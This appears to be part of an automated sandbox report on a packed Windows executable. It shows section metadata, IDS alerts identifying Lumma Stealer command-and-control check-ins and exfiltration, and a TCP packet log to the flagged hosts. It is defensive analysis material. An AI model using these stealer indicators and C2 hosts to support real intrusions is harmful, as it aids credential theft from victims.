                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x531f80x8.idata
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                          0x10000x510000x24800084c04bdb9c53ebf68f21f3db4e15135False0.9973980629280822data7.976841630322983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .rsrc 0x520000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .idata 0x530000x10000x20019a29171433eeef17e42fd663f137134False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          qxtptbyt0x540000x2a00000x2a00005e272f4f504e5b77d6cd6ebaa80a3d9eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          fodmgcsz0x2f40000x10000x400d62cc8a309ff1276fc7ff0c89ce13a7bFalse0.798828125data6.278127864237946IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          .taggant0x2f50000x30000x220056ca593a4a651ef048c6f5872b167f8dFalse0.0661764705882353DOS executable (COM)0.7971112201755248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                          DLLImport
                                                                                                                                                          kernel32.dlllstrcpy
                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                          2024-12-23T09:16:41.578258+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649721172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:42.339574+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649721172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:42.339574+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649721172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:43.576322+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649722172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:44.341927+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.649722172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:44.341927+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649722172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:46.568277+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649727172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:47.622739+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.649727172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:49.148799+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649728172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:51.897153+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649739172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:54.597336+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649746172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:16:57.153372+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649752172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:17:02.105430+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649763172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:17:02.919814+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649763172.67.150.173443TCP
                                                                                                                                                          2024-12-23T09:17:04.644220+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.649769185.166.143.48443TCP
                                                                                                                                                          2024-12-23T09:17:07.061631+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.6497763.5.29.90443TCP
                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Dec 23, 2024 09:16:40.267559052 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:40.267606974 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:40.267682076 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:40.270967007 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:40.270977020 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:41.578174114 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:41.578258038 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:41.579973936 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:41.579978943 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:41.580214977 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:41.625329971 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:41.654557943 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:41.654576063 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:41.654650927 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:42.339493990 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:42.339591026 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:42.339659929 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:42.346040964 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:42.346060038 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:42.346072912 CET49721443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:42.346080065 CET44349721172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:42.362215042 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:42.362288952 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:42.362377882 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:42.362688065 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:42.362737894 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:43.576241970 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:43.576322079 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:43.577759981 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:43.577771902 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:43.578028917 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:43.579574108 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:43.579603910 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:43.579639912 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.341942072 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.341988087 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.342144966 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.342206955 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.342217922 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.342297077 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.342333078 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.343493938 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.343573093 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.343590975 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.351936102 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.355252028 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.355287075 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.360142946 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.360203028 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.360243082 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.406641960 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.461622000 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.515990019 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.516036987 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.537900925 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.537955999 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.537980080 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.538022041 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.538070917 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.538077116 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.538120985 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.538492918 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.538513899 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:44.538539886 CET49722443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:44.538547039 CET44349722172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:45.349853992 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:45.349906921 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:45.349984884 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:45.350321054 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:45.350333929 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:46.568161011 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:46.568276882 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:46.569757938 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:46.569771051 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:46.570627928 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:46.572827101 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:46.573019028 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:46.573051929 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.622749090 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.622863054 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.622967958 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.623608112 CET49727443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.623629093 CET44349727172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.936441898 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.936492920 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:47.938028097 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.938412905 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:47.938426018 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.148721933 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.148798943 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.150476933 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.150487900 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.150722980 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.151947975 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.152081013 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.152115107 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:49.152174950 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:49.152189016 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.427051067 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.427166939 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.427223921 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.427354097 CET49728443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.427371979 CET44349728172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.685180902 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.685236931 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:50.685326099 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.685693026 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:50.685703039 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.897068977 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.897152901 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.899123907 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.899138927 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.899398088 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.901766062 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.901904106 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.901925087 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:51.901973963 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:51.901983023 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:52.842695951 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:52.842783928 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:52.842827082 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:52.843059063 CET49739443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:52.843075991 CET44349739172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:53.380677938 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:53.380716085 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:53.384471893 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:53.384833097 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:53.384843111 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.597245932 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.597336054 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.601788998 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.601809978 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.602052927 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:54.608603954 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.612842083 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:54.612854958 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.379576921 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.379729986 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.379781008 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.380068064 CET49746443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.380081892 CET44349746172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.938924074 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.938975096 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:55.939141989 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.939517021 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:55.939532042 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.153299093 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.153372049 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.154973030 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.154983044 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.155222893 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.156761885 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.157727003 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.157759905 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.157864094 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.157893896 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158102989 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158138990 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158284903 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158313990 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158499002 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158530951 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158668041 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158691883 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158699989 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158715963 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158859968 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.158885956 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.158906937 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.159472942 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.159503937 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199336052 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199546099 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199583054 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199604034 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199621916 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199644089 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199657917 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:16:57.199671030 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:16:57.199677944 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.812747955 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.812861919 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.812930107 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.813201904 CET49752443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.813221931 CET44349752172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.891539097 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.891581059 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:00.891658068 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.892209053 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:00.892225027 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.105350971 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.105429888 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.106894016 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.106904030 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.107161045 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.108623028 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.108664989 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.108705044 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.919791937 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.919888020 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.920015097 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.920320988 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.920351028 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:02.920424938 CET49763443192.168.2.6172.67.150.173
                                                                                                                                                          Dec 23, 2024 09:17:02.920433044 CET44349763172.67.150.173192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:03.059566975 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:03.059616089 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:03.059820890 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:03.060080051 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:03.060101986 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:04.643795967 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:04.644220114 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:04.645833015 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:04.645847082 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:04.646282911 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:04.647608042 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:04.691325903 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.345698118 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.345729113 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.345798016 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.345797062 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:05.345868111 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:05.345868111 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:05.346791983 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:05.346791983 CET49769443192.168.2.6185.166.143.48
                                                                                                                                                          Dec 23, 2024 09:17:05.346817970 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.346827984 CET44349769185.166.143.48192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.641371012 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:05.641402006 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:05.641526937 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:05.642014980 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:05.642025948 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.061543941 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.061630964 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:07.063493967 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:07.063500881 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.063730955 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.064977884 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:07.107323885 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.545017004 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.594094992 CET49776443192.168.2.63.5.29.90
                                                                                                                                                          Dec 23, 2024 09:17:07.596616030 CET443497763.5.29.90192.168.2.6
                                                                                                                                                          Dec 23, 2024 09:17:07.596642971 CET443497763.5.29.90192.168.2.6
